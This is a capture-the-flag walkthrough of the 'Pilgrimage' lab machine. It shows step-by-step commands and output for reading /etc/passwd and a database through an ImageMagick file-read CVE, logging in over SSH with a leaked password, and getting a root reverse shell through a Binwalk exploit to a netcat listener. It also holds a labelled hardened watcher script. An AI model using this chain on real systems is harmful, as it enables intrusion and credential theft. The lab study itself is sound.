Port scan first:
sudo nmap -sCV 10.10.11.219
Relevant output:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
|_http-title: Pilgrimage - Shrink Your Images
| http-git:
|   10.10.11.219:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Pilgrimage image shrinking service initial commit. # Please ...
|_http-server-header: nginx/1.18.0
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Very interesting! We see "Git repository found!" But before we get to that, we paste the server IP into our browser and find that no website loads, even though we are redirected to the URL:
http://pilgrimage.htb/
The hostname is not resolvable from our machine, so we add an entry to our local hosts file and see if that fixes the issue:
sudo nano /etc/hosts
Below the 127.x.x.x loopback entries, add:
10.10.11.219 pilgrimage.htb
Then hit Ctrl+O and Enter to save, and Ctrl+X to close the editor. After refreshing the page in the browser, the website now loads:
Save space and shrink it! A free online image shrinker. Create an account to save your images!
Instead of inspecting this website's frontend, let's check if we can obtain the Git repository first. We will use the tool git-dumper to download it.
sudo pip install git-dumper
git-dumper http://pilgrimage.htb/.git/ git
It worked!
cd git
ls
Outputs:
assets dashboard.php index.php login.php logout.php magick register.php vendor
When inspecting the PHP code of index.php, we can see how the website's image upload works:
- the server gets a POST request
- if an image is provided, the code to shrink and save it gets executed
- the shrunk images are saved under "http://pilgrimage.htb/shrunk"
- we can also see that ImageMagick is used to do the resizing
To find out if this program is vulnerable, we run
./magick -version
Relevant output:
Version: ImageMagick 7.1.0-49
And indeed, this version is vulnerable to arbitrary file read (CVE-2022-44268). Let's follow the steps provided by Voidz0r (https://github.com/voidz0r/CVE-2022-44268):
git clone https://github.com/voidz0r/CVE-2022-44268
cd CVE-2022-44268
cargo run "/etc/passwd"
convert image.png -resize 50% output.png
Then we upload the file "output.png" via the website's file upload. A link to the processed image is displayed; we click it and download the image to our system:
http://pilgrimage.htb/shrunk/64d67aba91b5c.png
Then we run:
identify -verbose 64d67aba91b5c.png
Relevant output:
Raw profile type: (long hex string omitted here; it is decoded below)
Let's convert that!
Paste the hex-encoded string into a file called "hex.txt". Then run these commands to make it human readable:
xxd -r -p hex.txt > decoded_hex.txt
cat decoded_hex.txt
Outputs:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
emily:x:1000:1000:emily,,,:/home/emily:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
We see that a user named "emily" exists. From our earlier look at the PHP source, we know that the website uses a SQLite database. Its path is
/var/db/pilgrimage
So we create another .png file:
cargo run "/var/db/pilgrimage"
Then we repeat the steps above: resize the generated image, upload it, download the processed image and analyze it.
convert image.png -resize 50% output.png
Upload the file output.png, then download the resized image from the website and run:
identify -verbose 64d67aba91b5c.png
This time the value of "Raw profile type" is much larger. Copy all of it, paste it into a file and decode it so we can read it:
sudo nano hex2.txt
xxd -r -p hex2.txt > decoded_hex2.txt
cat decoded_hex2.txt
Relevant output:
abigchonkyboi123
Since port 22 (SSH) is open on the server, we try these credentials now:
ssh emily@10.10.11.219
password: abigchonkyboi123
Success!
cat user.txt
Time for privilege escalation. When checking the output of the command:
ps -aux
We find one interesting thing:
root 652 0.0 0.0 6816 2376 ? S 01:18 0:00 /bin/bash /usr/sbin/malwarescan.sh
We can view the content of this bash script:
cat /usr/sbin/malwarescan.sh
Returns:
#!/bin/bash
blacklist=("Executable script" "Microsoft executable")

/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
	filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
	binout="$(/usr/local/bin/binwalk -e "$filename")"
	for banned in "${blacklist[@]}"; do
		if [[ "$binout" == *"$banned"* ]]; then
			/usr/bin/rm "$filename"
			break
		fi
	done
done
The script watches the directory /var/www/pilgrimage.htb/shrunk/ and, running as root, calls Binwalk with extraction (-e) on every newly created file to check for malware, deleting the file if the output matches the blacklist.
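A hardened rewrite of this watcher, added here as an example and not the box's own script: it refuses to run as root, lets binwalk do a signature-only scan (no -e, so untrusted uploads are never extracted), takes the path from inotifywait's --format instead of sed-parsing for CREATE, and also quarantines PNGs that carry the "Raw profile type" chunk seen in the identify output earlier. It assumes the same binwalk and inotifywait paths as the original and that the chunk keyword is stored verbatim in the file (PNG text-chunk keywords are never compressed).

```shell
#!/bin/sh
# Hardened malwarescan.sh (added example, not the original script).
# Assumptions: started as a dedicated unprivileged user; binwalk and
# inotifywait live at the paths the original script used.
set -eu

WATCH_DIR="/var/www/pilgrimage.htb/shrunk"

# Return 0 when binwalk's signature output names a blacklisted file type.
# A case pattern replaces the bash array loop; plain POSIX sh suffices.
is_blacklisted() {
    case "$1" in
        *"Executable script"*|*"Microsoft executable"*) return 0 ;;
    esac
    return 1
}

# Return 0 when a PNG carries a "Raw profile type" text chunk, the marker
# that identify -verbose showed when ImageMagick embedded /etc/passwd.
has_raw_profile() {
    grep -a -q -- 'Raw profile type' "$1"
}

# Decide whether a newly created file is removed. Signature scan only:
# no -e, so binwalk never extracts attacker-controlled archives.
scan_file() {
    file="$1"
    [ -f "$file" ] || return 0
    binout="$(/usr/local/bin/binwalk "$file" 2>/dev/null || true)"
    if is_blacklisted "$binout" || has_raw_profile "$file"; then
        /usr/bin/rm -f -- "$file"
        echo "removed: $file" >&2
    fi
}

main() {
    if [ "$(id -u)" -eq 0 ]; then
        echo "refusing to run as root" >&2
        exit 1
    fi
    # --format '%w%f' prints the full path of the created file directly.
    /usr/bin/inotifywait -m -q -e create --format '%w%f' "$WATCH_DIR" |
    while IFS= read -r path; do
        scan_file "$path"
    done
}

# Only start watching when asked, so the functions can be sourced and tested.
if [ "${1:-}" = "--watch" ]; then main; fi
```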
binwalk
Reveals:
Binwalk v2.3.2
This version is vulnerable to remote command execution (RCE)! In the Exploit Database (link below) we find a script to exploit the vulnerability.
mkdir temp
cd temp
sudo nano exploit.py
Copy the code into the file, then save and exit. Then run the script with your machine's IP address and any port:
touch exp.png
python3 exploit.py exp.png 10.10.15.5 1337
A file named binwalk_exploit.png is created.
Then open a new console and start a Netcat listener on the port you specified above:
netcat -lvnp 1337
Now upload the binwalk_exploit.png file via SCP to the /shrunk directory:
scp binwalk_exploit.png emily@10.10.11.219:/var/www/pilgrimage.htb/shrunk/
Because the watcher script processes every new file in that directory, the file gets handled and our Netcat listener receives the reverse shell!
cd ~
cat root.txt
Done!
The following attempts did not help, but are an honorable mention for other projects:
Testing for SQL-Injection
It seems we can create a new account with any credentials:
User name: test
Password: test
Let's check whether we receive a user cookie that we can edit to try SQL injection. We use the Firefox add-on "Cookie-Editor" (https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/). When logged in, the add-on shows us:
Name: PHPSESSID
Value: a6fm0i6d6js3oe0ksil89an83m
We will now use the tool sqlmap with the above name/value pair:
sqlmap -u "http://pilgrimage.htb/dashboard.php" --cookie="PHPSESSID=a6fm0i6d6js3oe0ksil89an83m"
Use GoBuster to find all pages
gobuster dir --url http://pilgrimage.htb/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html
Reveals:
/.html          (Status: 403) [Size: 153]
/index.php      (Status: 200) [Size: 7621]
/login.php      (Status: 200) [Size: 6166]
/register.php   (Status: 200) [Size: 6173]
/assets         (Status: 301) [Size: 169] [--> http://pilgrimage.htb/assets/]
/logout.php     (Status: 302) [Size: 0] [--> /]
/vendor         (Status: 301) [Size: 169] [--> http://pilgrimage.htb/vendor/]
/dashboard.php  (Status: 302) [Size: 0] [--> /login.php]
/tmp            (Status: 301) [Size: 169] [--> http://pilgrimage.htb/tmp/]
/.html          (Status: 403) [Size: 153]